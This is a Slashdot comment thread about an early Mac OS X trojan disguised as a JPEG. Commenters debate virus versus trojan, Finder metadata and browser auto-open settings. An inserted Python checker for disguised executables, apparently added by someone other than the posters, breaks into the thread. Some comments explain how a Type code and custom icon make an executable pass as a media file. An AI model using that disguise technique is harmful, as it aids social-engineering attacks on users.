    I happen to be in the camp that says "Show me a virus on OS X". It's debatable if this is a virus or a Trojan, but in some ways it would be nice to just get a virus and be done with it. Then all the neigh-sayers can jump up and down in Glee saying "I told you...I told you...nananana"...I can then ignore them finally and get back to using my Mac, a system that even if one virus/trojan is found is STILL a better, more secure system than Windows.

    1. Re:Thank GOD there is finally a virus by ninja_assault_kitten · · Score: 1

      Don't get so defensive, hippy.

    2. Re:Thank GOD there is finally a virus by Anonymous Coward · · Score: 0

      its not debatable, its a trojan

    3. Re:Thank GOD there is finally a virus by mph · · Score: 1
      Then all the neigh-sayers can jump up and down...
      Stop dragging the horses into this.
  60. Means... by Greyfox · · Score: 1
    People are starting to target the platform. This sort of attack has been around for decades, and would work just as well on Linux as it would on OSX -- if I send someone an executable and they run it, there's not much that can be done.

    What OS and App manufacturers CAN do is make it harder to inadvertently run such programs. Saving files from the net in a non-executable directory tree would be a good start. Setting up apps that might be exposed to hostile behavior to run as another user and making sure that the user they run as can't access anything useful, run servers or open outbound connections would be another.

    I think users are getting more savvy about security, too. Complacency on Windows systems can cost you, and users are becoming increasingly aware that Microsoft isn't going to protect them. Maybe sometime around September 6000, 1993 it might finally become October. Maybe September 7000...

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  61. Um, NO. "OS X", not "OSX" by Anonymous Coward · · Score: 0

    Um, no. The official title has a space between OS and X.

    Suggest you take a look at a definitive source. Perhaps http://www.apple.com/ would be acceptable to you. Take a look at the top right tab. If that doesn't convince you, click on that tab.

    Personally I don't care which you use, but if you're going to go around correcting folks, it pays to check your facts first.

  62. Re:Won't someone please think of the children!?!?! by tbone1 · · Score: 0
    [Thinks of the children]

    Mmm, delicious! Pass the kitten gravy, please.

    --

    The Independent: Reverend Spooner Arrested in Friar Tuck Incident - ISIHAC, Historical Headlines
  63. Rocket Scientist by ninja_assault_kitten · · Score: 1

    Thanks for your keen insight.

  64. Dangerous, but not a virus by wtmcgee · · Score: 1

    A file that 'looks' like a jpg, that, upon clicking asks for your admin password is not a virus. It's still quite dangerous, but it looks like a trojan or a script of some kind.

    There is no OS that can protect from user stupidity - whether it's Linux, OS X or Windows.

    --
    *** For a better tomorrow, change your life today ***
  65. "Bon Jour" Messaging by datasetgo · · Score: 1

    ahh hell, I'm still waiting on Bon Scott messaging. You know it'd be a helluvah lot cooler.

  66. OT - never got that by BitterAndDrunk · · Score: 2, Insightful
    I never really got the whole "look we'll hide the file type for you! So convenient!" thing in Windows. The first thing I do on a new Windows box is unhide system files and unhide known extensions.

    And a whole bunch of other file display changes; icons don't help me as much as created date, file type, etc.

    Anyway. This was a useful post.

    --
    You better watch out, there may be dogs about . . .
    1. Re:OT - never got that by JasonKChapman · · Score: 2, Interesting
      never really got the whole "look we'll hide the file type for you! So convenient!" thing in Windows. The first thing I do on a new Windows box is unhide system files and unhide known extensions.

      Oddly, it was intended to make Windows more Mac-like. The Mac GUI was heralded as being simpler and easier to use precisely because it didn't bog users down with techno-jargon like ".exe", ".com", etc. Windows decided to follow suit, while leaving the option available. The problem is, they were hiding the *one bloody thing* that determined whether or not the entity would execute with a double-click. OSs with execute bits don't need no stinkin' extensions for that.

      --
      Sorry, I'm a writer. That makes you raw material.
  67. Ed. update title to be more descriptive TROJAN!!!! by webweave · · Score: 1

    What's with you guys. Next thing I'll find is the dupe.

  68. Custom icons in Mac OS 7 through 9 by tepples · · Score: 1


    So, why allow customization of icons?


    Because Mac users expect it. The feature was present in versions 7 through 9 of the operating system, and apps often wrote a thumbnail into the custom icon.

  69. List View by Kadin2048 · · Score: 5, Informative

    That's a totally legitimate question.

    If you choose "View as List" in the finder (equivalent to the Detail view in Windows), and then expand the window so that you can see the "Kind" column, the Finder will tell you the kind of file you're looking at. For example, Application, Picture, Document, etc.

    The Finder looks at some stuff which is not visible to the user in determining this -- in addition to the ".app" file extension on Cocoa bundles, there are also the traditional Mac 'Type' and 'Creator' codes, stored in the file metadata in the resource fork. By setting a file's Type to "APPL," it becomes an executable. This is the traditional Macintosh analog to the UNIX eXecute bit (but arguably more flexible, since it also handles file typing), and is totally independent of the file name. But anything that you set this way will be clearly marked as an Application in List View, regardless of what you name it, or what kind of custom icon it has.

    This is how the MP3Concept trojan worked, and how many old-school ResEdit tricks worked. You can have something that's legitimately named "Mp3Concept.mp3" and looks like an MP3 but is really an executable, by setting the Type and custom icons correctly. It's nothing new, people have been doing it for years. (There were a lot of ResEdit "hacks" that worked off of this principle -- for example, creating a dummy Excel document that gave a rude dialog when double-clicked.) I think it's because we've migrated away from OS 9 and the metadata concepts that people have forgotten how easy it is to do, and that the Mac still supports it.

    --
    "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    1. Re:List View by Burz · · Score: 1

      A user should not have to go that far.

      An OS should enforce a standard image overlay (like a red circle or arrow) on all executables. It's astounding to me that no OS in wide use will consistently show code and data as distinct.

      Sometimes an application's associated types have the SAME icon as the app itself! We can blame users for laxity, but developers have done their part in confusing code/data in their minds.

  70. Mac OS X, not just OS X by tepples · · Score: 1

    Except that the product name is OS X

    No, the product name is Mac OS X.

    1. Re:Mac OS X, not just OS X by cailyoung · · Score: 1

      You are correct, sir, but that doesn't make the GP correct.

  71. Re:MOD PARENT UP - IT IS A VIRUS by DrLex · · Score: 3, Insightful
    Face it fanboys: your god has a virus. And even worse, you are so technically incompetent you don't even know what a virus is. You aren't qualified to be taking part in this discussion.

    Face it trollboy: if you had made some more effort to see how it works, you would see from your own quoted definitions that this is not a virus. A virus spreads between different computers without any user interaction. However, this thing is only able to send the fake JPEG file to other computers via a few IM programs. The users on those other computers still need to be online, accept the file, and open it themselves to 'install' it. Therefore it is a trojan. Only within the limits of a single computer could it be considered a virus, because it can copy itself automatically to other programs upon opening an infected one (provided that the user who opens it has enough privileges to modify programs).
  72. I like OS X, but... by Deslock · · Score: 1

    ... why did they use the "all or nothing" approach of requiring the admin password to install some things? Why not introduce a new model where everything in the filesystem is an object of one of the following types:

    - operating system
    - hardware
    - hardware configuration
    - program
    - program configuration
    - interface configuration
    - data

    Have the option of using different passwords for access to operating system, hardware, and program objects. When you run a program installer, it wouldn't be able to mess with your hardware or OS that way. The admin password would basically never be needed unless you were doing OS updates.

    1. Re:I like OS X, but... by Stalin · · Score: 1

      The programs that install with the system installer program (whatever its name is) install to the system-wide "/Applications" directory, by default. If you specify a user's "~/Applications" directory, I don't think you have to type the root password. I'm not sure about that, though; I don't install too many programs that use that installer. The ones I do install, which use it, I don't mind them installing to the system-wide directory. Any drag-and-drop install programs I download go into my "~/Applications" directory (or a sub-directory thereof).

      Also, there are some programs that install more than just what you interact with. A couple of examples: I have a USB->Serial adapter that requires a kernel extension to use. It installs with the system installer. Also, NeoOffice installs at least one thing that goes into a protected directory -- a Spotlight plugin. Sure, they could install the plugin to the user's local Spotlight plugin directory, but they don't.

      In short, I don't mind having to use my root password to install some things. I just make sure I know what is actually being installed when I do so. That is what the password prompt is for -- to make the user question what they are doing.

  73. Duh. What I left out... by Kadin2048 · · Score: 1

    Oh, and the most obvious thing, you'd have to also look for the resource fork's Type code that's used on Carbon apps, and flag it as executable if the Type was APPL.

    (See my other comments in this discussion -- this is how MP3Concept works, and the Type code is the traditional, pre-OSX Mac analog to the UNIX eXecute bit or the Windows/DOS file extension.)

    --
    "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
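    Kadin2048's two posts above (List View, and the follow-up about the resource-fork Type code) describe the signals that give a disguised file away regardless of its name or icon: the classic "APPL" Type code in the Finder metadata, the executable content itself, and the .app bundle layout. The following checker is an added example, not code from any poster here or from Apple; it assumes the 32-byte com.apple.FinderInfo layout (Type code in the first 4 bytes), a Linux-style os.getxattr for reading it, and constructed byte strings in place of the real trojan file.

```python
import os
from dataclasses import dataclass, field
from typing import List, Optional

# Classic Mac OS Finder metadata: the com.apple.FinderInfo xattr is a 32-byte
# block whose first 4 bytes are the Type code and next 4 the Creator code.
FINDER_INFO_XATTR = "com.apple.FinderInfo"
APPLICATION_TYPE_CODE = "APPL"

# Mach-O magic numbers as they appear on disk, in both byte orders
# (MH_MAGIC, MH_MAGIC_64, FAT_MAGIC). FAT_MAGIC 0xCAFEBABE is shared with
# Java class files, so a hit there means "executable container", not proof.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit Mach-O
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit Mach-O
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",  # fat/universal binary
}
JPEG_SOI = b"\xff\xd8\xff"  # every JPEG starts with the SOI marker
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".tif", ".tiff"}


@dataclass
class Verdict:
    name: str
    claims_image: bool           # the file name says "I am a picture"
    content_kind: str            # "mach-o", "jpeg", "bundle" or "unknown"
    finder_type: Optional[str]   # classic Type code, e.g. "APPL"
    exec_bit: bool
    reasons: List[str] = field(default_factory=list)

    @property
    def disguised(self) -> bool:
        """True when the name claims an image but something says 'runnable'."""
        return self.claims_image and bool(self.reasons)


def finder_type_code(finder_info: Optional[bytes]) -> Optional[str]:
    """Return the 4-char Type code from a FinderInfo block, or None if unset."""
    if finder_info is None or len(finder_info) < 8:
        return None
    code = finder_info[:4]
    if code == b"\x00\x00\x00\x00":
        return None
    return code.decode("mac_roman", "replace")


def classify_content(head: bytes) -> str:
    """Identify the first bytes of a file; the extension is not consulted."""
    if head[:4] in MACHO_MAGICS:
        return "mach-o"
    if head.startswith(JPEG_SOI):
        return "jpeg"
    return "unknown"


def name_claims_image(name: str) -> bool:
    """'photo.jpg' and 'Photo.jpg.app' both present themselves as pictures."""
    stem, ext = os.path.splitext(name)
    inner_ext = os.path.splitext(stem)[1]
    return ext.lower() in IMAGE_EXTENSIONS or inner_ext.lower() in IMAGE_EXTENSIONS


def assess(name: str, head: bytes, finder_info: Optional[bytes] = None,
           exec_bit: bool = False) -> Verdict:
    """Judge a file from its name, first bytes, FinderInfo and mode bits."""
    v = Verdict(name=name,
                claims_image=name_claims_image(name),
                content_kind=classify_content(head),
                finder_type=finder_type_code(finder_info),
                exec_bit=exec_bit)
    if v.content_kind == "mach-o":
        v.reasons.append("content is a Mach-O executable, not image data")
    if v.finder_type == APPLICATION_TYPE_CODE:
        v.reasons.append("FinderInfo Type code is APPL (Finder treats it as an app)")
    if v.exec_bit:
        v.reasons.append("execute bit is set")
    return v


def assess_path(path: str) -> Verdict:
    """Disk-backed wrapper; reads the xattr only where Python has os.getxattr."""
    if os.path.isdir(os.path.join(path, "Contents", "MacOS")):
        # An .app bundle is a directory; its icon and name prove nothing.
        v = Verdict(name=os.path.basename(path),
                    claims_image=name_claims_image(os.path.basename(path)),
                    content_kind="bundle", finder_type=None, exec_bit=True)
        v.reasons.append("directory is an application bundle (Contents/MacOS)")
        return v
    with open(path, "rb") as f:
        head = f.read(16)
    finder_info = None
    getxattr = getattr(os, "getxattr", None)  # absent on macOS builds of Python
    if getxattr is not None:
        try:
            finder_info = getxattr(path, FINDER_INFO_XATTR)
        except OSError:
            pass
    return assess(os.path.basename(path), head, finder_info,
                  os.access(path, os.X_OK))


if __name__ == "__main__":
    # Constructed stand-in for the disguised file: Mach-O header, APPL type, +x.
    fake = assess("latestpics.jpg", b"\xce\xfa\xed\xfe" + b"\x00" * 12,
                  b"APPL????" + b"\x00" * 24, exec_bit=True)
    print(fake.name, "disguised" if fake.disguised else "ok", fake.reasons)
```

Running assess_path over a download folder gives the same "Kind"-style answer the List View shows, without trusting the icon or the extension.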
  74. ITYM "Bon Jovi Messaging"? by argent · · Score: 1

    That'd make this the first "Retrosexual Virus".

  75. Also not the first for OS/X by hawk · · Score: 1
    Someone needs to point out that this is hardly the first virus that will work on OS X.

    All of the older unix viruses still work just fine.
    Remember the honor system viruses, which informed you that you were now obligated to delete a few files at random and then send the virus on?

    :)


    hawk

  76. If it spreads, then isn't it a 'virus'? by I'm+Don+Giovanni · · Score: 1

    Disregarding the old-school viruses that attached themselves to executables, isn't today's definition of "virus" = "malware that spreads"? If this is spreading through instant messaging, then it's a virus (or at least as much as a Windows virus is; Windows doesn't have many old-school "attach to executable" viruses either).

    If this is merely a trojan, then it's not the first. A couple of years ago there was malware disguised as a pirated version of MacWord 2004 on warez sites.

    --
    -- "I never gave these stories much credence." - HAL 9000
  77. Bundles aren't a problem by alanQuatermain · · Score: 1

    There are routines to get the path to a bundle's executable file. It doesn't matter what the extension is, etc. So the Finder can very easily determine whether something is in fact executable. For an example, pop open the Inspector window in the Finder (Cmd-Opt-i) and select a few files. If they're applications, that window will tell you so. If it doesn't say they're an app, the Finder won't even try to launch them. Also, in 10.4.4 upwards, it'll put 'Universal', 'Intel', or 'PowerPC' after the file kind. So, it's not at all difficult to have the Finder flag executable files with a badge.

    -Q

  78. Social Engineering Always Works, BUT... by argent · · Score: 1

    Social Engineering Always Works.

    This is not a security hole in the OS, this is a social engineering attack, just like every previous "first OS X virus" has been.

    Social engineering works, BUT for most people it doesn't work very often. Once is usually enough... UNLESS the system trains them to click "OK" when presented with a security dialog. If you can keep it from working a second time, you'll kill this kind of attack dead.

    I've had the same people come to me many times and say "Peter, I think I have a virus, I clicked 'OK' again". I've never had someone come to me and say "Peter, I saved a file and opened it and I think I have a virus" more than once. Because when you download a file, there's no urgency, you don't have to decide RIGHT THEN whether to go on with it. You can stop and wait, and no reflex loop develops. And that pause, even if it's brief, is more than enough for most people to get out of the "open everything anyway" habit.

    In Safari, TURN OFF "OPEN SAFE FILES AFTER DOWNLOAD". There are NO "safe" files that are guaranteed to be safe.

    In instant messaging, don't use an application that doesn't give you the ability to completely disable automatic execution (with or without a dialog) of downloaded files.

    Back when social engineering was the virus vector, and you had to actually save a file to disk and open it as a separate action, viruses spread slowly. When Microsoft integrated IE and the desktop and allowed automatic execution of untrusted content, THAT is when they took off. And the biggest problem with Microsoft setting such a low bar is that people accept a slightly higher bar (a dialog box) as OK, EVEN WHEN THAT IS PROVEN INADEQUATE.

    Users: Don't automatically open files.

    ALWAYS save them to disk, and run them by hand, later.

    Developers: Don't give users an option to bypass this step.

    1. Re:Social Engineering Always Works, BUT... by geekoid · · Score: 1

      Market will not allow this.
      If people cannot open files when they want to, they will favor a system that does. Which obviously creates a market demand that will be exploited.

      Perhaps it should open in a sandbox, and the system should look at what it is trying to do, Then act upon that information?

      --
      The Kruger Dunning explains most posts on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    2. Re:Social Engineering Always Works, BUT... by argent · · Score: 1

      If people cannot open files when they want to, they will favor a system that does.

      There's an awful lot of people using Firefox and other Mozilla-based browsers that have this option turned off by default, and provide a more convenient download manager to provide the capability.

      Perhaps it should open in a sandbox

      The files that can be opened in a sandbox are opened in a sandbox. The browser itself. "Open Safe Files" opens those files that require an external program, outside the sandbox.

  79. Social Engineering vs Dialog Boxes by argent · · Score: 1

    I've been saying that dialog boxes asking "DO YOU WANT TO DO THIS STUPID THING" were a stupid idea since before Safari was created.

    And I've been saying this was a problem in Safari since it's existed.

    Users: TURN OFF "OPEN SAFE FILES AFTER DOWNLOADING"

    Apple: TAKE THAT OPTION OUT OF SAFARI.

    1. Re:Social Engineering vs Dialog Boxes by ceoyoyo · · Score: 1

      Um, this isn't a safe file. Safari will warn you when you download it that it's an app, then you'll have to go and open it yourself, manually.

      Repeat, this is not a JPEG file that Safari will open automatically for you. That would be a real, serious vulnerability.

    2. Re:Social Engineering vs Dialog Boxes by argent · · Score: 1

      Safari will warn you when you download it that it's an app, then you'll have to go and open it yourself, manually.

      OK, that's one point in Safari's favor, and people who are infected by this through Safari won't make that mistake again. There have, however, been other attacks that did merely present a dialog box, and there will be more in the future as more holes in applications that register with LaunchServices are found.

      What about AIM? What interface does it present? A dialog box?

    3. Re:Social Engineering vs Dialog Boxes by ceoyoyo · · Score: 1

      You can't really blame the OS for the sins of third party apps though. Entourage used to be fond of autolaunching things for you, even on a Mac. The OS can't really stop it, because there are legitimate uses for that sort of thing. It was a flaw in Entourage which, I think, has since been fixed (I wouldn't know, I don't run it). Same with AIM.

      Now, the OS does exactly what it should in such a case -- if you run stupid software it prevents the damage from spreading beyond your account. Unless of course you're an administrator and are accommodating enough to enter your password.

    4. Re:Social Engineering vs Dialog Boxes by argent · · Score: 1

      You can't really blame the OS for the sins of third party apps though.

      I'm not blaming the OS, I'm blaming the dialog boxes. Plus... does Safari/Finder actually force you to open the file manually, or does it just give you two dialog boxes instead of one?

      if you run stupid software it prevents the damage from spreading beyond your account

      Man, I've been a UNIX guy since I worked on 4.1C at Berkeley in the early '80s, and I wish Windows had better security around Administrator as well, but that's just silly. The only things on my computer I care about damaging are in my account, AND there's more than enough places for a virus to hide in ~/Library that, well, I guess it's a good thing that the author of this program wasn't more clear-headed.

    5. Re:Social Engineering vs Dialog Boxes by ceoyoyo · · Score: 1

      I'm not blaming the OS, I'm blaming the dialog boxes.

      What dialog boxes? The one in Safari that says "Hey, this is an application, are you sure you want to do this?" And no, Safari will absolutely not run a program for you. You've got to trundle over and double click it yourself. I don't think iChat will open anything for you.

      The only things on my computer I care about damaging are in my account...

      Sure, but how is an OS supposed to stop you from doing that if you're an idiot? If you drag everything to the trash and empty it do you expect more than an "Are you sure?" dialog?

      What the OS SHOULD do is protect your account from the sins of others. I feel much better letting friends check their e-mail and things on my computer knowing that I can just fast user switch them over to another account and they can't do any real damage. If I had to share a computer with someone, ditto.

      You can hide a lot of stuff in ~/Library, but it won't affect me (another user) in the slightest because I've got a different ~/Library.

    6. Re:Social Engineering vs Dialog Boxes by argent · · Score: 1

      Sure, but how is an OS supposed to stop you from doing that if you're an idiot?

      It's not, but it's not supposed to encourage it either.

      I feel much better letting friends check their e-mail and things on my computer knowing that I can just fast user switch them over to another account and they can't do any real damage.

      They can unwittingly leave a background botnet relay running, turning your computer into a virus distribution center and DDoS slave every time they use it.

    7. Re:Social Engineering vs Dialog Boxes by ceoyoyo · · Score: 1

      So in this case how is OS X encouraging you to hose your home dir? It's warning you that the thing you just downloaded is an app, has to decompress it because OS X apps are directories and can only be distributed in packaged form (unlike legit JPEGs), then making you go find it and double click on it. Anything more than that and I'd be complaining because it was a pain to work with the OS.

      As for the botnet, that's true, but it'll get turned off when they log out. The OS can't really be expected to tell the difference between a botnet and a legitimate server, can it? I don't think OS X will allow a program to add itself to the autostart list unless you give it your password either.

    8. Re:Social Engineering vs Dialog Boxes by argent · · Score: 1

      So in this case how is OS X encouraging you to hose your home dir?

      I'm talking about cases where "Open safe files after downloading" is relevant.

      I already said that if this exploit doesn't take advantage of that, it's not a problem, but there have been in the past and will be in the future applications registered with LaunchServices that ARE exploitable. Safari should not act as an enabler for those exploits.

      As for the botnet, that's true, but it'll get turned off when they log out.

      Not if they know about fopen, fwrite, fork, setsid, and execl.

      [example code and other comments deleted lest some idiot think it's a big secret and flame me for "posting an exploit to slashdot"]

    9. Re:Social Engineering vs Dialog Boxes by ceoyoyo · · Score: 1

      I don't really see how it's a big problem. Yes, if I install a program on my computer that abuses the "safe files" then bad things could happen. But that program could do other much worse things than asking Safari to let it know when certain types of files are downloaded.

      If there's some sort of exploit, say in an actual JPEG file, then I think it's much more important to fix that exploit than to just tell Safari not to open them for you. If I go and click on something and download a JPEG file I'm going to open it if Safari doesn't do it for me, triggering the exploit anyway.

    10. Re:Social Engineering vs Dialog Boxes by argent · · Score: 1

      Yes, if I install a program on my computer that abuses the "safe files" then bad things could happen.

      You're thinking backwards.

      We're not talking about an installed program deliberately abusing "open safe files".

      We're talking about an installed program having a bug in it that allows it to be exploited, like the "help" or "man" bugs that have already shown up and been patched, individually, or like the "chm" bug on Windows.

      If you turn off "open safe files", none of those bugs can be automatically exploited.

      I think it's much more important to fix that exploit than to just tell Safari not to open them for you

      If you have a *real* JPEG file, Safari will open it itself. That's not the problem, it's the next ".foo" file that is run by "BuggyApplication" that happens to be widely installed. If you turn off "open safe files" you won't be one of the people who are exploited by the ".foo hole".

    11. Re:Social Engineering vs Dialog Boxes by ceoyoyo · · Score: 1

      That's a good point... I personally always turn off open safe files. It's only really a problem if you can convince Safari to download something automatically though. I much prefer my browser not to download ANYTHING unless I tell it to. If I explicitly tell it to download something then it's not so bad if it opens it for me, since I'll be opening it anyway.

    12. Re:Social Engineering vs Dialog Boxes by argent · · Score: 1

      I much prefer my browser not to download ANYTHING unless I tell it to.

      Unfortunately, if it hits a link it doesn't know how to render, it downloads it. You can't turn that off... but you can keep it from using LaunchServices to open it after it's downloaded.

      I turn off "Mount Disk Images" and "Continue to Expand" in Stuffit Expander, for the same reason.

  80. Now I can say "I told you so". by argent · · Score: 1

    No application that displays untrusted content should EVER have an option to open files automatically after downloading. No matter whether it thinks they're safe or not. No matter whether you pop up an "I'M ABOUT TO DO A STUPID THING, IS THIS OK?" dialog first. Don't do the stupid thing.

    Downloaded files should be dropped in the user's download folder, and left there for the user to take care of or not at their leisure.

    CDROMs and USB keys and other external storage should be mounted, and made available to the user, but NEVER EVER auto-run.

    Files outside specific "application" or "plugin" locations should never be considered as potential handlers for content, and there must be no mechanism to move files to these locations without an EXPLICIT request by the user.

    (yes, that means no auto-installing Dashboard plugins or Firefox extensions... and of course ActiveX is beyond the pale)

    I've been trying to make this point to developers and software publishers for at least seven years now, but they're all following Microsoft like lemmings. I've sent in bug reports, suggestions, and made personal requests to people at Apple asking them to back away from the edge before they go over. But... no...

    Apple: I TOLD YOU SO.

    Everyone else: TURN OFF OPEN SAFE FILES AFTER DOWNLOADING. DON'T USE APPLICATIONS THAT DON'T LET YOU DISABLE AUTO EXECUTE. That means Internet Explorer, Outlook, AIM, anything else that will run untrusted content without you explicitly pointing at a file and saying "OK, I've downloaded this, run it".

    1. Re:Now I can say "I told you so". by geekoid · · Score: 1

      People don't want that, and they would rather take the risk and have the inevitable problem be fixed. Preferably their 'anti-virus' software would catch it and alert them.

      If people have to change what they want to what the computer wants, then computers have failed us.

      --
      The Kruger Dunning explains most posts on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    2. Re:Now I can say "I told you so". by Anonymous Coward · · Score: 0

      You might want to hold off on the "I told you so" until you actually read the article and understand what we're talking about here.

      Safari won't just open this app. The user first has to request that the file be downloaded, then Safari will ask if the user would like to open it, then the app is decompressed and launched, then the Finder alerts them that this is a new app being run and asks for verification to do so, then the app asks for the user's password, then the app is executed. Where's the problem there? Yeah, it's with the user.

      You can't seriously say that Safari is in any way at fault here. How would it be better if Safari just dumped the downloaded file into the user's download directory so they had to go double-click it from there to start the same sequence of events? There'd be no added protection at all since the user has to *want* to download the file (and presumably wouldn't just change their mind about opening it because Safari didn't do that for them), and in both cases, the user has to start the process manually and OK several levels of confirmation to get at the payload.

    3. Re:Now I can say "I told you so". by argent · · Score: 1

      People don't want that, and they would rather take the risk...

      You can't actually say that people want it. People are not presented with the choice. The browser shows up, and it works that way, and they get used to clicking OK because that's just the way it works. Even if there's an option to turn it off, it's on by default.

      Most people don't even wonder if it might not actually be easier if they get downloads as packages in their mailbox instead of "OMG the computer's asking me a question gotta DO something", because they're too used to doing things the way the computer wants.

      The current situation is like, oh, imagine if the postman showed up and refused to go away until you actually opened every envelope and inspected the contents, and took away the ones you didn't want to open. Do you really think people would prefer that to just picking up their mail and sorting through it at their convenience?

      People have been trained to do things the way the programmer thought they should. That's the real failure.

    4. Re:Now I can say "I told you so". by Anonymous Coward · · Score: 0

      You still don't get it. Do you even use a Mac? To use your own analogy: It would be like the postman asking if you'd like him to wait and help with opening your mail. If you say yes, he'll actually open your mail for you, show you its contents, and then file it away to the location you've previously specified. If you say no to him, he simply puts your mail where you want it and allows you to open it at your leisure.

      Safari still downloads the file to the download directory and leaves it there whether you give it the OK to open the file or not. All it's really doing is asking if you want to open the file you just told it to download instead of just downloading the file and making you switch out of Safari to the Finder, locate the file, then open the file. How is there added security by making the user do that additional work? How often will a user manually click to download something that they don't intend to go and open? Maybe there's a few instances where someone clicks the wrong link to DL something and then absentmindedly clicks "OK" to open that file, but even then the Finder will alert you to a new executable being run and require your password to do so - you still have those 2 additional chances to stop things from going any further. If the user doesn't notice that something's amiss when doing all that, what are the odds that they'd notice if they also had to go and manually double-click on the file?

      Do you work for Sophos or something?

    5. Re:Now I can say "I told you so". by goMac2500 · · Score: 1

      Um. Nothing opens it automatically after downloading. The user has to double click it to open it. Safari will not automatically open things anyway, and will ask you before decompressing anything with an executable in it.

      No, you can't say you told us so.

    6. Re:Now I can say "I told you so". by 99BottlesOfBeerInMyF · · Score: 1

      No application that displays untrusted content should EVER have an option to open files automatically after downloading.

      Wow, that is going to make Web browsing really suck when I have to download the HTML file and all the images and then open them by hand.

      Files outside specific "application" or "plugin" locations should never be considered as potential handlers for content, and there must be no mechanism to move files to these locations without an EXPLICIT request by the user. (yes, that means no auto-installing Dashboard plugins or Firefox extensions... and of course ActiveX is beyond the pale)

      How does this increase security? At least by auto placing them (with an appropriate dialogue confirmation) the files go in the right place and users aren't accustomed to having to move some random file to some random location to get things to work, which is a lot more dangerous than moving executables to a properly insulated sandbox. (Not that OS X does use a properly insulated sandbox mind you.)

      Anyway, in this particular case auto-running content is not exploited anyway. You have to manually run the script with a jpeg icon on it.

    7. Re:Now I can say "I told you so". by geekoid · · Score: 1

      Actually I can say that because I helped with several studies on those issues. In fact MS (my study was not associated with theirs in any way) did a study as well, and even after educating the users, a significant portion still wanted it as a feature.

      Your analogy isn't even close. It's not correct in method or situation.

      --
      The Kruger Dunning explains most posts on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    8. Re:Now I can say "I told you so". by argent · · Score: 1

      How is there added security by making the user do that additional work?

      Nobody goes and finds a downloaded file and opens it by reflex. It's a deliberate and deferred action. Even from programs with a download manager, it's not something that easily triggers a reflex.

      Like I said, I have never had one of my users come to me and say "I did it again, Peter, I've downloaded a file to my desktop and opened it and I've got a virus." I've had people do that once, but never twice. I've had users come to me multiple times saying they'd clicked on the "OK" button again, because they click on that button so many times that it's meaningless.

      This is the real world, not some Microsoft sponsored study that presented a false choice between two extreme alternatives. There's lots of better ways to make the job easier on the user without encouraging dangerous habits.

      Firefox and Camino give you a better alternative than either option, a download manager that works well, letting you see the files you've downloaded and from there show them in Finder or open them, without having to hunt through anything.

      even then the Finder will alert you to a new executable being run and require your password to do so

      Um, it will only do that if the guy who wrote the malware is naive. There are so many ways to hide stuff without having privileges that there's no point asking for them.

      Do you work for Sophos or something?

      Hardly. Sophos' answer to the problem is "buy our expensive crap". My answer is "change your behaviour". Antivirus software is a protection racket. I don't use it and I haven't had a virus on any of my personal computers since 1988.

    9. Re:Now I can say "I told you so". by argent · · Score: 1

      even after educating the users, significant portion still wanted it as a feature.

      Did you give them the option of a proper download manager (either as part of the application, as in the Mozilla family browsers, or in another program like the BeOS Tracker) or did you give them the two extremes?

      Did you pick users who had not previously used either interface, or did they just prefer what they were used to?

      Unless the answers are "yes" and "yes", your survey is worthless.

    10. Re:Now I can say "I told you so". by argent · · Score: 1

      Wow, that is going to make Web browsing really suck when I have to download the HTML file and all the images and then open them by hand.

      Har bloody har.

      At least by auto placing them (with an appropriate dialogue confirmation) the files go in the right place and users aren't accustomed to having to move some random file to some random location to get things to work, which is a lot more dangerous than moving executables to a properly insulated sandbox.

      Where did I say that they would have to manually move a file to some random location? I said that they shouldn't do it automatically on download without an explicit request from the user. Navigating to the file in Finder or running it from a download manager counts as a request to run what's in that file.

      in this particular case auto-running content is not exploited anyway

      Not in Safari, anyway. It seems that AIM is less cautious.

    11. Re:Now I can say "I told you so". by 99BottlesOfBeerInMyF · · Score: 1

      Har bloody har.

      Hey, you make ridiculous demands, I'll happily demonstrate why they are ridiculous. There are plenty of instances when it is expected and appropriate for a program to download and then automatically display/execute the content of that download.

      Where did I say that they would have to manually move a file to some random location? I said that they shouldn't do it automatically on download without an explicit request from the user. Navigating to the file in Finder or running it from a download manager counts as a request to run what's in that file.

      Then why did you explicitly mention Dashboard which already asks the user if they would like it to install the file for them?

      Not in Safari, anyway. It seems that AIM is less cautious.

      I'm confused. First AIM is a protocol. Are you referring to the official AIM client for OS X or something different? And you're saying it auto extracts the .tgz file and then runs the contained script upon transfer? Or are you referring to iChat? Or are you referring to something else entirely?

    12. Re:Now I can say "I told you so". by argent · · Score: 1

      There are plenty of instances when it is expected and appropriate for a program to download and then automatically display/execute the content of that download.

      The option I'm talking about, "Open safe files after downloading", does not apply to any of those cases. And you know that.

      Then why did you explicitly mention Dashboard which already asks the user if they would like it to install the file for them?

      If the user has explicitly requested that the file be run, locally... rather than having that execution happen automatically without anything but simple dialog boxes after the link is clicked... it doesn't matter whether it's an application, a Dashboard widget, a screen saver, the user has explicitly requested execution, rather than simply allowed it to happen.

      Now, going back a few messages, you said Safari doesn't automatically run the file. Do you mean that Safari leaves the file in place and you have to explicitly navigate to and open it in Finder, or that Safari gives you a dialog box before calling Finder, which then gives you another dialog box?

    13. Re:Now I can say "I told you so". by Anonymous Coward · · Score: 0

      Well, most of what you say is simply opinion so there's no point in discussing it further as you're stuck in your current mindset, but...

      Um, it will only do that if the guy who wrote the malware is naive. There are so many ways to hide stuff without having privileges that there's no point asking for them.

      It may not ask for the password if it doesn't need elevated privileges, but the Finder will prompt when any application is being run for the first time. That dialog box should be coming up pretty rarely for the average user and should definitely get a second thought. Also, it's mostly Windows users that get badly into the habit of just clicking away dialog boxes since Windows and Windows applications throw up so many of them. Most Mac users I've had experience with see them infrequently enough to take a second to look at what's happening.

      Of course, you'll just say that isn't the case and move on with your argument. Fine. Perhaps you should mandate a different system that does things "correctly" for the users you have control over and, for the ones you don't, stop the vitriolic whining.

    14. Re:Now I can say "I told you so". by 99BottlesOfBeerInMyF · · Score: 1

